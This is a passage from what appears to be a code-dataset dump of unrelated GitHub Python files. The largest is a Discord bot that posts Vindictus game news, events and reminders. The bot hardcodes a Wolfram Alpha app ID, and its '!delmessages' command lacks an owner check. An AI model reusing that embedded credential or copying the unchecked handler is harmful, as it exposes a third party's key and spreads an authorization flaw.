Chroma(persist_directory=\"/root/DISC-LawLLM/VectorDataBase\", embedding_function=embeddings)\n message = ''\n docs = db.similarity_search_by_vector(embedding_vector, k=3, fetch_k=10)\n for i, doc in enumerate(docs):\n message = message + f\"{i+1}. {doc.page_content}\\n\"\n return message\n\nif __name__ == \"__main__\":\n print(quest(query = \"中国人民有哪些权力\"))\n\n\n","repo_name":"GrayZ77/LawLLM","sub_path":"match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34986826260","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^profesor-listado/$', views.profesor_listado, name='profesor_listado'),\n url(r'^profesor-crear/$', views.profesor_crear_modificar, name='profesor_crear'),\n url(r'^profesor-modificar/(?P\\d+)/$', views.profesor_crear_modificar, name='profesor_modificar'),\n url(r'^alumno-listado/$', views.alumno_listado, name='alumno_listado'),\n url(r'^alumno-detalle/(?P\\d+)/$', views.alumno_detalle, name='alumno_detalle'),\n url(r'^alumno-registrar/$', views.alumno_crear_modificar, name='alumno_crear'),\n]\n","repo_name":"danielhuamani/Proyecto-taller-base-datos","sub_path":"src/apps/alumno_profesor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24036347444","text":"import torch\nimport torchvision\nfrom sklearn.metrics import confusion_matrix\nimport numpy as np\nfrom torchvision import transforms\n\ndef evaluate_model(model, data_loader_test, device):\n '''\n Evaluation function. Calculates accuracy for the model using testset.\n Args:\n model (torch model): network model\n data_loader_test (torch Dataloader): testsets dataloader\n device (str): device that calculates the results, commonly 'cpu' or 'cuda:0'\n Returns:\n score (float): A score representing accuracy on testset. Multiple lower scores over few epochs might\n mean overfitting.\n data_log (numpy array): num_classes x num_classes confusion matrix. Tells the positive results compared to\n false negatives.\n '''\n model.eval()\n model.to(device=device)\n predictions, ground_truth = [], []\n correct = 0\n\n for batch_num, data in enumerate(data_loader_test):\n #Correct input data format and set device\n images = torch.stack([i[0]for i in data])\n images = images.to(device=device)\n targets = np.array([i[1] for i in data])\n \n with torch.no_grad():\n prediction = model(images)\n #Choose max prediction to represent class\n prediction = prediction.detach().cpu().numpy()\n prediction = np.argmax(prediction, axis=1)\n \n #Add preditcions and ground truths to the result list\n predictions += list(prediction)\n ground_truth += list(targets)\n \n #Compare gt and pred lists and calculate number\n #of correct predictions\n for i in range(len(predictions)):\n if predictions[i] == ground_truth[i]:\n correct += 1\n score = correct / len(ground_truth)\n\n class_names = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']\n return score, predictions, ground_truth, class_names\n","repo_name":"Averu333/Classification_project","sub_path":"utils/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5939426335","text":"import asyncio\nimport discord\nimport json\nfrom bs4 import BeautifulSoup\nimport requests\nimport time\nimport datetime\nimport functools\nfrom concurrent.futures import CancelledError\nimport aiohttp\nimport math\nimport string\nimport youtube_dl\nimport async_timeout\nfrom PIL import Image\nimport io\nimport re\nimport sys\nimport os\n\npost_queue = asyncio.Queue()\nwolfram_queue = asyncio.Queue()\n\ndev = True if \"--dev\" in sys.argv or \"-d\" in sys.argv else False\nbot_name = \"Dev bot\" if dev else \"Vindictus Bot\"\n\nprint(\"Starting \" + bot_name)\ntoken_file = \"token_dev.txt\" if dev else \"token.txt\"\nconfig_file = \"dev.config\" if dev else \"bot.config\"\nwith open(token_file) as f:\n token = f.read()\nif not \"messages.json\" in os.listdir():\n sent_messages = []\n with open(\"messages.json\", \"w+\") as f:\n json.dump({\"messages\": sent_messages}, f, indent=4)\nelse:\n with open(\"messages.json\") as f:\n sent_messages = json.load(f)[\"messages\"]\n\nwith open(config_file) as f:\n configs = json.load(f)\n\nif not \"notifications.json\" in os.listdir():\n notifications = []\n with open(\"notifications.json\", \"w+\") as f:\n json.dump(notifications, f, indent=4)\nelse:\n with open(\"notifications.json\") as f:\n notifications = json.load(f)\n\nlog_file = \"log.log\"\nwolfram_appid = \"7W664G-6TT5XQA4XX\"\nwolfram_url = \"http://api.wolframalpha.com/v1/result\"\nmonths_re = \"January|February|March|April|May|June|July|August|September|October|November|December\"\n#months_re = \"Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec\"\nmonths_array = [\"\", \"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"July\", \"August\", \"September\", \"October\", \"November\", \"December\"]\n#months_array = [\"\", \"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\", \"Jun\", \"Jul\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"]\ndays_re = \"([0-9]|)[0-9]\"\nyears_re = \"20[0-9][0-9]\"\nnews_log_length = 35\n\ntry:\n open(log_file).close()\nexcept FileNotFoundError:\n open(log_file, \"w+\").close()\n\nwith open(\"news.json\") as news_json:\n news = json.load(news_json)\n \nnews_link = \"http://vindictus.nexon.net/news/all/\"\n\nclass Event:\n def __init__(self, name=None, start=None, end=None, link=None, jjson=None):\n self.name = name\n self.start = start\n self.end = end\n self.url = link\n\n if jjson != None:\n self.from_json(jjson)\n\n def is_going_on(self):\n return self.start < datetime.datetime.now() < self.end\n\n def has_finished(self):\n return datetime.datetime.now() > self.end\n\n def is_new(self):\n return datetime.timedelta() < datetime.datetime.now() - self.start < datetime.timedelta(days=3)\n\n def print_self(self):\n print(self.name)\n print(self.start)\n print(self.end)\n\n def to_json(self):\n return {\n \"name\": self.name,\n \"url\": self.url,\n \"start\": self.start.timestamp(),\n \"end\": self.end.timestamp()\n }\n\n def from_json(self, jjson):\n self.name = jjson[\"name\"]\n self.url = jjson[\"url\"]\n self.start = datetime.datetime.fromtimestamp(jjson[\"start\"])\n self.end = datetime.datetime.fromtimestamp(jjson[\"end\"])\n\nwith open(\"events.json\") as events_json:\n events_sales = json.load(events_json)\n events = list(map(lambda x: Event(jjson=x), events_sales[\"events\"]))\n sales = list(map(lambda x: Event(jjson=x), events_sales[\"sales\"]))\n \n\nclass discordClient(discord.Client):\n async def on_ready(self): \n self.post_channels = []\n self.player = None\n self.voice = None\n self.trash_messages = []\n\n servers_in_configs = configs[\"guilds\"].keys()\n for server in self.servers:\n if not server.id in servers_in_configs:\n configs[\"guilds\"][server.id] = configs[\"base\"].copy()\n post_channel = configs[\"guilds\"][server.id][\"news_channel\"]\n if post_channel:\n post_channel = self.get_channel(post_channel)\n self.post_channels.append(post_channel)\n print(\"Posting to: \" + post_channel.name + \" in \" + server.name)\n appinfo = await self.application_info()\n self.owner = appinfo.owner\n try:\n self.tasks\n printlog(\"Client restarted for some reason\")\n except AttributeError:\n self.tasks = []\n self.tasks.append(asyncio.ensure_future(get_news(), loop = self.loop))\n self.tasks.append(asyncio.ensure_future(news_poster(self), loop = self.loop))\n self.tasks.append(asyncio.ensure_future(wolfram_responder(self), loop = self.loop))\n self.tasks.append(asyncio.ensure_future(notifier(self), loop = self.loop))\n log(str(datetime.datetime.now()) + \": Ready\")\n\n async def on_server_join(self, server):\n for ch in server.channels:\n if ch.name == \"general\":\n post_ch = ch\n break\n configs[\"guilds\"][server.id] = configs[\"base\"].copy()\n if post_ch:\n configs[\"guilds\"][server.id][\"news_channel\"] = post_ch.id\n await self.send_message(\n post_ch,\n \"Posting news to this channel. Change this with !channel *#general*\"\n )\n print(\"Posting to \" + post_ch.name + \" in \" + server.name)\n\n async def on_server_remove(self, server):\n self.post_channels = [ch for ch in self.post_channels if ch.server != server]\n if server.id in configs[\"guilds\"]:\n del configs[\"guilds\"][server.id]\n \n async def on_message(self, message):\n # !DELMSG AND !GAME\n if message.channel.is_private and \"!game\" in message.content:\n if message.author == self.owner:\n await self.change_presence(game =\n discord.Game(name = \" \".join(message.content.split()[1:])))\n elif message.channel.is_private and \"!delmsg\" in message.content:\n if message.author == self.owner:\n msgid = message.content.split()[-1]\n msg = None\n if len(message.content.split()) == 2:\n msg = discord.utils.find(lambda m: m.id == msgid, self.messages)\n errmsg = \"No such message found, try !delmsg [ch id] [msg id]\"\n elif len(message.content.split()) == 3:\n chid = message.content.split()[-2]\n ch = self.get_channel(chid)\n if ch:\n msg = await self.get_message(ch, msgid)\n errmsg = \"Couldn't find a message with id \" + msgid\n else:\n errmsg = \"Couldn't find a channel with id \" + chid\n else:\n errmsg = \"Incorrent parameter count\"\n \n if not msg:\n await self.send_message(message.channel, errmsg)\n else:\n try:\n await self.delete_message(msg)\n await self.send_message(message.channel, \"Message deleted\")\n except:\n await self.send_message(message.channel, \"Couldn't delete message\")\n elif len(message.content.split()) > 1 and message.content.split()[0] == \"!purge\":\n # !purge userid start_msg_id end_msg_id\n appinfo = await self.application_info()\n if message.author == appinfo.owner:\n auth = message.content.split()[1]\n start_msg_id = message.content.split()[2]\n end_msg_id = message.content.split()[3]\n try:\n start_msg = await self.get_message(message.channel, start_msg_id)\n end_msg = await self.get_message(message.channel, end_msg_id)\n await self.purge_from(\n message.channel,\n check=lambda msg: msg.author.id == auth,\n before=end_msg,\n after=start_msg)\n except discord.Forbidden:\n await self.send_message(message.channel, \"Not allowed\")\n except discord.NotFound:\n await self.send_message(message.channel, \"Message not found\")\n except discord.HTTPException:\n await self.send_message(message.channel, \"Failed\")\n else:\n await self.send_message(message.channel, \"You have no permission\")\n \n \n\n # !DELMESSAGES\n elif message.channel.is_private and \"!delmessages\" in message.content.lower():\n # syntax: !delmessages chid list of msgid\n cnt = message.content.lower()\n chid = cnt.split()[1]\n messageids = cnt.split()[2:]\n ch = self.get_channel(chid)\n messages = []\n for msgid in messageids:\n messages.append(await self.get_message(ch, msgid))\n if len(messages) > 1:\n try:\n await self.delete_messages(messages)\n except discord.Forbidden:\n for msg in messages:\n try:\n await self.delete_message(msg)\n except Exception as e:\n await self.send_message(message.channel, e)\n\n elif len(messages) == 1:\n await self.delete_message(messages[0])\n await self.send_message(message.channel, \"Deleted messages\")\n\n\n # HANDLE SNOWVISION\n elif len(message.content.split()) >= 2 and message.content.lower().split()[0] == \"!snowvision\":\n valid_extensions = [\"jpeg\", \"jpg\", \"png\"]\n url = message.content.split(\" \")[-1].split(\"?\")[0]\n if url.split(\".\")[-1].lower() in valid_extensions:\n await sendImage(url, message.channel, self)\n\n # HANDLE EVENTS AND SALES\n elif message.content.lower() in [\"!events\", \"!sales\"]:\n await postEvents(message.content.lower(), message.channel, self)\n\n # HANDLE REFRESH\n elif message.content.lower() == \"!refresh\":\n await self.send_message(message.channel, \"Refreshing\")\n urls = []\n for news_piece in news[\"news\"]:\n if not news_piece[\"link\"] in urls:\n urls.append(news_piece[\"link\"])\n for url in urls:\n await parseEvents(url)\n await self.send_message(message.channel, \"Finished\")\n\n # HANDLE EMOTES\n elif \"!emote\" in message.content.lower() or \"!animated\" in message.content.lower():\n for emoji in self.get_all_emojis():\n if emoji.name.lower() == message.content.lower().split()[-1]:\n pref = \"a\" if \"!animated\" in message.content.lower() else \"\"\n name = emoji.name\n idd = emoji.id\n await self.send_message(message.channel, \"<{}:{}:{}>\".format(pref, name, idd))\n try: \n await self.delete_message(message)\n except:\n print(\"Tried to delete message, unable\")\n break \n\n # HANDLE REACTIONS\n elif \"!react\" in message.content.lower():\n # msg syntax !react [msg id] [ch id] [emote name]\n split = message.content.lower().split()\n msgid = split[1]\n chid = split[2] if len(split) == 4 else None\n emotename = split[-1]\n emote = None\n for emoji in self.get_all_emojis():\n if emoji.name.lower() == emotename:\n emote = emoji\n break\n if emote:\n ch = self.get_channel(chid)\n msg = await self.get_message(ch, msgid) if chid else discord.utils.find(lambda m: m.id == msgid, self.messages)\n await self.add_reaction(msg, emote)\n await asyncio.sleep(0.5)\n await self.wait_for_reaction(timeout=10, message=msg)\n await self.remove_reaction(msg, emote, msg.server.me)\n\n # HANDLE ADDING NEW EVENT\n elif message.content.lower() == \"!addevent\":\n global events\n global sales\n self.trash_messages.append(message)\n\n timeo = 30\n sender = message.author\n channel = message.channel\n event_type = None\n while event_type == None:\n m = await self.send_message(channel, \"Enter type (event / sale)\")\n self.trash_messages.append(m)\n resp = await self.wait_for_message(timeout=timeo, author=sender)\n if resp != None:\n self.trash_messages.append(resp)\n if resp.content.lower() in [\"event\", \"sale\"]:\n event_type = resp.content.lower()\n else:\n break\n\n if event_type != None:\n event_name = None\n m = await self.send_message(channel, \"Enter {} name\".format(event_type))\n self.trash_messages.append(m)\n name_resp = await self.wait_for_message(timeout=timeo, author=sender)\n if name_resp != None:\n self.trash_messages.append(name_resp)\n event_name = name_resp.content\n \n if event_name != None:\n start_date = None\n while start_date == None:\n m = await self.send_message(channel, \"Enter starting date\")\n self.trash_messages.append(m)\n start_resp = await self.wait_for_message(timeout=timeo, author=sender)\n if start_resp != None:\n self.trash_messages.append(start_resp)\n start_mon = re.search(months_re, start_resp.content)\n start_day = re.search(days_re, start_resp.content)\n if start_mon != None and start_day != None:\n start_mon = months_array.index(start_mon.group())\n start_date = datetime.datetime(\n datetime.date.today().year,\n start_mon,\n int(start_day.group()),\n 10\n )\n else:\n break\n\n if start_date != None:\n end_date = None\n while end_date == None:\n m = await self.send_message(channel, \"Enter ending date\")\n self.trash_messages.append(m)\n end_resp = await self.wait_for_message(timeout=timeo, author=sender)\n if end_resp != None:\n self.trash_messages.append(end_resp)\n end_mon = re.search(months_re, end_resp.content)\n end_day = re.search(days_re, end_resp.content)\n if end_mon != None and end_day != None:\n end_mon = months_array.index(end_mon.group())\n end_year = datetime.date.today().year\n end_year = end_year + 1 if end_mon < start_mon else end_year\n end_date = datetime.datetime(\n end_year,\n end_mon,\n int(end_day.group()),\n 10\n )\n else:\n break\n\n if end_date != None:\n link = None\n m = await self.send_message(channel, \"Enter event link\")\n self.trash_messages.append(m)\n link_resp = await self.wait_for_message(timeout=timeo, author=sender)\n if link_resp != None:\n self.trash_messages.append(link_resp)\n link = link_resp.content\n\n if event_type != None and event_name != None and start_date != None and end_date != None:\n e = Event(event_name, start_date, end_date, link)\n events.append(e) if event_type == \"event\" else sales.append(e)\n sales_not_finished = [sale for sale in sales if not sale.has_finished()]\n events_not_finished = [event for event in events if not event.has_finished()]\n with open(\"events.json\", \"w+\") as f:\n json.dump({\n \"events\": [event.to_json() for event in events_not_finished],\n \"sales\": [sale.to_json() for sale in sales_not_finished]}, f, indent=4)\n sender_name = sender.nick or sender.name\n await self.send_message(channel, \"{} added a new {}: {}\".format(sender_name,\n event_type,\n event_name))\n else:\n await self.send_message(channel, \"Stopped adding a new event\")\n\n await self.delete_messages(self.trash_messages)\n\n #!ACTIVE AND !INACTIVE\n elif message.content.lower() in [\"!active\", \"!inactive\"]:\n if message.server.name in [\"Vindi\", \"Dev serv\"]:\n active_role = discord.utils.get(message.server.roles, name=\"Vindictus Active\")\n if message.content.lower() == \"!active\":\n if not active_role in message.author.roles:\n await self.add_roles(message.author, active_role)\n await self.add_reaction(message, \"✅\")\n else:\n await self.add_reaction(message, \"❌\")\n elif message.content.lower() == \"!inactive\":\n if active_role in message.author.roles:\n await self.remove_roles(message.author, active_role)\n await self.add_reaction(message, \"✅\")\n else:\n await self.add_reaction(message, \"❌\")\n\n # !NOTIFY\n elif \"!notify\" in message.content.lower() and \"!notify\" in message.content.lower().split()[0]:\n if \"!notify_everyone\" in message.content.lower():\n text = \"@everyone \"\n elif \"!notify_here\" in message.content.lower():\n text = \"@here \"\n else:\n text = \"\"\n global notifications\n cnt = message.content\n time_pattern = \"([0-2]?[0-9]:[0-5][0-9])\"\n day_pattern = \"([0-3]?[0-9])(?: ?st| ?nd| ?rd| ?th)\"\n full_pattern = \"(\" + months_re + \")\" + \" \" + day_pattern + \",* \" + time_pattern + \" (.*)\"\n result = re.search(full_pattern, cnt)\n if result:\n cur_year = datetime.datetime.now().year\n month = result.group(1)\n day = result.group(2)\n time = result.group(3)\n text += result.group(4)\n dt = datetime.datetime(\n year=cur_year,\n month=months_array.index(month),\n day=int(day),\n hour=int(time.split(\":\")[0]),\n minute=int(time.split(\":\")[1]),\n )\n notifi = {\n \"time\": dt.timestamp(),\n \"text\": text,\n \"channel\": message.channel.id\n }\n notifications.append(notifi)\n with open(\"notifications.json\", \"w\") as f:\n json.dump(notifications, f, indent=4)\n await self.send_message(message.channel, \"New notification created!\")\n else:\n await self.send_message(message.channel, \"Couldn't parse the message, make sure its format is '!notify December 24th 18:00 Merry Christmas Everyone!'\")\n\n # CONFIGS\n elif \"!channel\" in message.content and len(message.channel_mentions) == 1:\n perm = message.author.server_permissions\n owner = message.author == self.owner\n if perm.administrator or perm.manage_server or owner:\n ch = message.channel_mentions[0]\n self.post_channels.append(ch)\n configs[\"guilds\"][message.server.id][\"news_channel\"] = ch.id\n await self.send_message(message.channel, \"Posting news to \" + ch.mention)\n\n #HANDLE WOLFRAM ALPHA\n elif len(message.content) > 1 and message.content.lower().split()[0] in [\"!wolfram\", \"!alpha\", \"!wolf\", \"!wolframalpha\"]:\n await wolfram_queue.put(message)\n\n\n async def on_member_join(self, member):\n if member.server.name == \"Vindi\":\n newb_role = discord.utils.get(member.server.roles, name=\"Newbs\")\n await self.add_roles(member, newb_role)\n\ndef log(text):\n limit = 2000\n if not str(datetime.date.today().year) + \"-\" in text:\n text = str(datetime.datetime.now()) + \": \" + text\n if not \"\\n\" in text:\n text += \"\\n\"\n with open(log_file) as log:\n lines = log.readlines()\n lines.append(text)\n\n with open(log_file, \"w\") as log:\n log.write(\"\".join(lines[max(0, len(lines) - limit):len(lines)]))\n\ndef printlog(text):\n print(text)\n log(text)\n\nasync def get_news():\n global news\n while loop.is_running():\n new_news = {\"news\": []}\n\n try:\n with async_timeout.timeout(10):\n async with aiohttp.ClientSession() as session:\n async with session.get(news_link) as response:\n resText = await response.text()\n except asyncio.TimeoutError:\n await asyncio.sleep(60)\n soup = BeautifulSoup(resText, \"html.parser\")\n\n news_raw = soup.find_all(\"div\", class_ = \"news-list-item\")\n\n for news_piece in news_raw:\n news_item = {}\n news_item[\"title\"] = news_piece.find(class_ = \"news-list-item-title\").text.replace(\"\\r\", \"\").replace(\"\\n\", \"\").replace(\"\\t\", \"\").replace(\" \", \"\")\n news_item[\"description\"] = news_piece.find(class_ = \"news-list-item-text\").text.replace(\"\\r\", \"\").replace(\"\\n\", \"\").replace(\"\\t\", \"\").replace(\" \", \"\")\n news_item[\"link\"] = \"http://vindictus.nexon.net\" + news_piece.find(class_ = \"news-list-link\").get(\"href\")\n news_item[\"image\"] = news_piece.find(class_ = \"news-thumbnail\").attrs[\"style\"][22:-2]\n new_news[\"news\"].append(news_item)\n\n news_list = new_news[\"news\"]\n news_list.reverse()\n for news_piece in news_list:\n if not news_piece in news[\"news\"]:\n await post_queue.put(news_piece)\n news[\"news\"].append(news_piece)\n log(\"New news found\")\n if new_news[\"news\"] != []:\n with open(\"news.json\", \"w\") as news_json:\n news[\"news\"] = news[\"news\"][max(0, len(news[\"news\"]) - news_log_length):]\n json.dump(news, news_json, indent=4)\n log(\"News gotten\")\n\n await asyncio.sleep(60)\n\nasync def news_poster(client):\n global sent_messages\n while loop.is_running():\n item = await post_queue.get()\n title = item[\"title\"]\n link = item[\"link\"]\n desc = item[\"description\"]\n news_id = link.split(\"/\")[4]\n emb = discord.Embed(\n title=title + \" - Vindictus\",\n description=desc,\n color=133916,\n url=link\n ).set_thumbnail(\n url=item[\"image\"]\n ).set_author(\n name=\"Vindictus - Official Website\",\n url=\"https://vindictus.nexon.net\"\n )\n \n for message in sent_messages:\n if message[\"id\"] == news_id:\n id_dict = message\n break\n else:\n id_dict = {\"id\": news_id}\n sent_messages.append(id_dict)\n\n maint = \"maintenance\" in title.lower() or \"maintenance\" in desc.lower()\n win_update = \"windows update\" in title.lower() or \"windows update\" in desc.lower()\n completed_maint = (maint or win_update) and \"complete\" in desc.lower()\n extended_maint = (maint or win_update) and \"extend\" in desc.lower()\n for channel in client.post_channels:\n if not channel.id in id_dict or completed_maint or extended_maint:\n sent_message = await client.send_message(channel, embed=emb)\n printlog(\"Sent: \" + title)\n id_dict[channel.id] = sent_message.id\n else:\n try:\n previous_message = await client.get_message(channel, id_dict[channel.id])\n await client.edit_message(previous_message, embed=emb)\n printlog(\"Edited: \" + title)\n except discord.NotFound:\n printlog(\"Tried to look for a message, not found\")\n except discord.Forbidden:\n printlog(\"Tried to look for a message, not allowed\")\n except discord.HTTPException:\n printlog(\"Tried to look for / edit a message, couldn't\")\n\n sent_messages = sent_messages[max(0, len(sent_messages) - news_log_length):]\n with open(\"messages.json\", \"w\") as messages_json:\n json.dump({\"messages\": sent_messages}, messages_json, indent=4)\n\n await parseEvents(link)\n\nasync def notifier(client):\n global notifications\n while loop.is_running():\n to_delete = []\n for notification in notifications:\n if notification[\"time\"] < time.time():\n await client.send_message(client.get_channel(notification[\"channel\"]), notification[\"text\"])\n to_delete.append(notification)\n if to_delete:\n for n in to_delete:\n notifications.remove(n)\n with open(\"notifications.json\", \"w\") as f:\n json.dump(notifications, f, indent=4)\n await asyncio.sleep(30)\n\nasync def wolfram_responder(client):\n while loop.is_running():\n message = await wolfram_queue.get()\n await client.send_typing(message.channel)\n i = \" \".join(message.content.split()[1:])\n params = {\"appid\": wolfram_appid, \"input\": i}\n async with aiohttp.ClientSession() as session:\n async with session.get(wolfram_url, params = params) as resp:\n answer = await resp.text()\n if answer == \"Wolfram|Alpha did not understand your input\":\n answer = \"I didn't quite understand\"\n if len(answer) > 1000:\n count = math.ceil(len(answer) / 1000)\n for x in range(0, count):\n await client.send_message(message.channel, answer[1000 * x : 1000 * (x + 1)])\n else:\n await client.send_message(message.channel, answer)\n\nasync def sendImage(url, destination, client):\n try:\n with async_timeout.timeout(20):\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as response:\n respBytes = await response.read()\n imgname = \"img.\" + url.split(\".\")[-1]\n oldimg = Image.open(io.BytesIO(respBytes))\n newimg = oldimg.convert(mode=\"L\")\n newimg.save(imgname)\n await client.send_file(destination, imgname)\n printlog(\"Sent an image\")\n except asyncio.TimeoutError:\n await asyncio.sleep(5)\n\nasync def parseEvents(url):\n global sales\n global events\n new_sales = []\n new_events = []\n tables = []\n \n try:\n with async_timeout.timeout(10):\n async with aiohttp.get(url) as response:\n respText = await response.text()\n print(\"Got a response\")\n soup = BeautifulSoup(respText, \"html.parser\")\n tables = soup.find_all(\"table\")\n except asyncio.TimeoutError:\n print(\"timeout\")\n\n items = {}\n names = []\n\n for table in tables:\n datas = table.find_all(\"td\")\n if len(datas) < 3:\n continue\n if len(datas) == 4 or datas[2].text.strip() not in [\"Sale Start\", \"Event Start\", \"Starting Date\"]:\n e_type = \"event\" if datas[0].text.strip() == \"Event Name\" else \"sale\"\n name = datas[2].text.strip()\n if not name in items:\n names.append(name)\n items[name] = {}\n if datas[1].text.strip() == \"Event Start\":\n items[name][\"start\"] = datas[3].text.strip()\n elif datas[1].text.strip() == \"Event End\":\n items[name][\"end\"] = datas[3].text.strip()\n items[name][\"type\"] = e_type\n else:\n name = datas[1].text.strip()\n start = datas[3].text.strip()\n end = datas[5].text.strip()\n e_type = \"event\" if datas[0].text.strip() == \"Event Name\" else \"sale\"\n items[name] = {\"start\": start, \"end\": end, \"type\": e_type}\n names.append(name)\n\n\n for name in names:\n item = items[name]\n if not (\"start\" in item and \"end\" in item):\n continue\n start = item[\"start\"]\n end = item[\"end\"]\n e_type = item[\"type\"]\n obj = None\n try:\n start_year = re.search(years_re, start)\n end_year = re.search(years_re, end)\n if start_year == None:\n start_year = datetime.date.today().year\n else:\n start_year = int(start_year.group())\n if end_year == None:\n end_year = datetime.date.today().year\n else:\n end_year = int(end_year.group())\n\n start_date = datetime.datetime(\n int(start_year),\n months_array.index(re.search(months_re, start).group()),\n int(re.search(days_re, start).group()),\n 10)\n\n end_date = datetime.datetime(\n int(end_year),\n months_array.index(re.search(months_re, end).group()),\n int(re.search(days_re, end).group()),\n 10)\n \n if start_date > end_date:\n end_date = end_date.replace(year=end_year + 1)\n \n obj = Event(name, start_date, end_date, url)\n except Exception as e:\n print(e)\n\n if obj:\n new_sales.append(obj) if e_type == \"sale\" else new_events.append(obj)\n\n old_sale_names = list(map(lambda x: x.name, sales))\n old_event_names = list(map(lambda x: x.name, events))\n\n sales += list(filter(lambda x: not x.name in old_sale_names, new_sales))\n events += list(filter(lambda x: not x.name in old_event_names, new_events))\n\n sales_not_finished = list(filter(lambda x: not x.has_finished(), sales))\n events_not_finished = list(filter(lambda x: not x.has_finished(), events))\n\n if (sales_not_finished != sales or events_not_finished != events\n or new_sales != [] or new_events != []):\n with open(\"events.json\", \"w+\") as f:\n json.dump({\"events\": list(map(lambda x: x.to_json(), events_not_finished)),\n \"sales\": list(map(lambda x: x.to_json(), sales_not_finished))}, f, indent=4)\n\nasync def postEvents(type, destination, client):\n\n li = events if type == \"!events\" else sales\n going_on = list(filter(lambda x: x.is_going_on(), li))\n\n emb = discord.Embed(colour=discord.Colour(int(\"020b1c\", 16)))\n emb.set_author(\n icon_url=\"https://cdn.discordapp.com/attachments/344883962612678657/399689459081150485/vindidiscord.png\",\n name=\"Vindictus \"+ type.replace(\"!\", \"\").capitalize())\n for event in going_on:\n start_month = months_array[event.start.month].capitalize()\n end_month = months_array[event.end.month].capitalize()\n start_date = start_month + \" \" + str(event.start.day)\n end_date = end_month + \" \" + str(event.end.day)\n name = event.name\n if event.is_new():\n name += \" (New!)\"\n emb.add_field(\n name=name,\n value=\"{} - {}. [Link]({})\".format(start_date, end_date, event.url),\n inline=False\n )\n await client.send_message(destination, embed=emb)\n\nloop = asyncio.get_event_loop()\ndiscord_client = discordClient(loop=loop)\n\ntry:\n loop.run_until_complete(discord_client.start(token))\n printlog(\"Loop finished\")\nexcept KeyboardInterrupt:\n printlog(\"Keyboard interrupted\")\nfinally:\n printlog(\"Logging out\")\n loop.run_until_complete(discord_client.logout())\n for task in discord_client.tasks:\n task.cancel()\n loop.stop()\n loop.close()\n printlog(\"Loop closed\")\n with open(config_file, \"w\") as f:\n json.dump(configs, f, indent=4)\n","repo_name":"teemusallyla/vindictus-discord-bot","sub_path":"VindictusBot.py","file_name":"VindictusBot.py","file_ext":"py","file_size_in_byte":33178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36570289468","text":"import re\nfrom consts import *\n\ndef format_regex(pattern: str, string: str) -> str:\n return pattern.format(string.replace('.', r'\\.'))\n \n\ndef print_diff(line: str, new_line: str) -> None:\n print(line[:-1], ' -->', new_line[:-1])\n\ndef replace_with(data: str, regex: str, target: str) -> str:\n lines = data.splitlines(True)\n new_data = ''\n for line in lines:\n if re.search(regex, line):\n new_line = re.sub(regex, target, line)\n new_data += new_line\n print_diff(line, new_line)\n else:\n new_data += line\n\n return new_data\n\n\ndef replace_keyword_import(data: str, to_str: str, regex: str) -> str:\n target = TARGET_KEYWORD_PATTERN.format(to_str)\n lines = data.splitlines(True)\n new_data = ''\n for line in lines:\n searched = re.search(regex, line)\n if searched and ' as ' in line:\n raise Exception('Found \"as\" in non-as-import')\n elif searched:\n new_line = re.sub(regex, target, line)\n new_data += new_line\n print_diff(line, new_line)\n else:\n new_data += line\n return new_data\n\n\ndef replace_namespace_of_import(data: str, to_str: str, regex: str, regex_in_string: str) -> str:\n target = fr'{to_str}.'\n lines = data.splitlines(True)\n new_data = ''\n for line in lines:\n if re.search(regex, line):\n if \"'\" in line or '\"' in line:\n if not re.search(regex_in_string, line):\n new_line = re.sub(regex, target, line)\n new_data += new_line\n print_diff(line, new_line)\n else:\n new_data += line\n raise Exception('Can\\'t handle quotes problem')\n else:\n new_line = re.sub(regex, target, line)\n new_data += new_line\n print_diff(line, new_line)\n else:\n new_data += line\n\n return new_data\n\n\ndef replace_as_import(data: str, to_str: str, regex: str) -> str:\n target = fr'import {to_str} as \\2'\n return replace_with(data, regex, target)\n\n\ndef replace_from_import(data: str, to_str: str, regex: str) -> str:\n target = f'from {to_str} import '\n return replace_with(data, regex, target)\n","repo_name":"motobep/spears","sub_path":"re_replace.py","file_name":"re_replace.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4805397478","text":"from pypdf import PdfReader\nfrom translate import Translator\ntranslator = Translator(to_lang='pt')\n\nreader = PdfReader(\"In The Night.pdf\")\n\nfor page in reader.pages:\n text = page.extract_text()\n linhas = text.splitlines()\n for linha in linhas:\n print(linha)\n traducao = translator.translate(linha)\n print(traducao, '\\n')\n \n \n","repo_name":"juniooor/PDF_Translator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30432597254","text":"import os\nimport sys\nfrom argparse import ArgumentParser\n\nfrom tensorflow.python.keras.models import load_model\n\nfrom util import load_dataset, normalise_data\n\n\ndef parse_arguments():\n parser = ArgumentParser(description='Photomath - test the model',\n epilog='NOTE: Please run scripts/homogenise_data.py first in case dataset is not homogeneous.\\n'\n 'Please run scripts/train.py first in case there is no saved model.')\n\n parser.add_argument('--dataset_path', type=str, default='resources/homogenised_dataset',\n help='path to the homogenised characters dataset')\n\n parser.add_argument('--width', type=int, default=45,\n help='width of the photos in the dataset')\n\n parser.add_argument('--height', type=int, default=45,\n help='height of the photos in the dataset')\n\n parser.add_argument('--model_path', type=str, default='final_model.h5',\n help='path of the trained model')\n\n return parser.parse_args()\n\n\ndef test():\n if not os.path.isdir(args.dataset_path):\n 